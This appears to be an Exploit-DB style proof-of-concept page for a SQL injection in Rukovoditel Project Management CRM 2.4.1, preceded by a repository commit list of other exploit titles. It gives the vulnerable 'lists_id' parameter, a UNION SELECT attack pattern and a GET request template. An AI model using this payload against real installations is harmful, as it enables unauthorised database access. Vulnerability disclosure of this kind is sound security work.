f700c5347d
8 changes to exploits/shellcodes Advanced File Manager 3.4.1 - Denial of Service (PoC) iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC) Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC) Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) HTML5 Video Player 1.2.5 - Local Buffer Overflow - Non SEH Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass) HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH) 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass) PDF Signer 3.0 - SSTI to RCE via CSRF Cookie PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie) Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)
41 lines
No EOL
1.5 KiB
Text
41 lines
No EOL
1.5 KiB
Text
#################################################################
|
|
|
|
# Exploit Title: Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL
|
|
Injection
|
|
# Dork: N/A
|
|
# Date: 27-01-2019
|
|
# Exploit Author: Mehmet EMIROGLU
|
|
# Vendor Homepage: https://www.rukovoditel.net/
|
|
# Software Link: https://sourceforge.net/projects/rukovoditel/
|
|
# Version: 2.4.1
|
|
# Category: Webapps
|
|
# Tested on: Wampp @Win
|
|
# CVE: N/A
|
|
# Software Description : Rukovoditel is a free web-based open-source
|
|
project management
|
|
application. A far cry from traditional applications, Rukovoditel gives
|
|
users a broader and extensive approach to project management. Its
|
|
customization options allow users to create additional entities, modify
|
|
and specify the relationship between them, and generate the necessary
|
|
reports.
|
|
|
|
#################################################################
|
|
|
|
# Vulnerabilities
|
|
# For the SQL injection to be applied, the user must log in.
|
|
then from the Application structure screen to the global list tab.
|
|
add new value button to create a new list. You can apply sql injection
|
|
through the generated list.
|
|
The pictures of the weaknesses are below.
|
|
https://i.hizliresim.com/nQJZm5.jpg
|
|
https://i.hizliresim.com/WqGmEQ.jpg
|
|
|
|
#################################################################
|
|
|
|
# POC - SQLi
|
|
# Parameters : lists_id=1 (string)
|
|
# Attack Pattern : -1'+UnIOn+SeLEcT+1,2--+
|
|
# GET Request :
|
|
http://localhost/[PATH]/index.php?module=global_lists/choices&lists_id=1'[SQL]
|
|
|
|
################################################################# |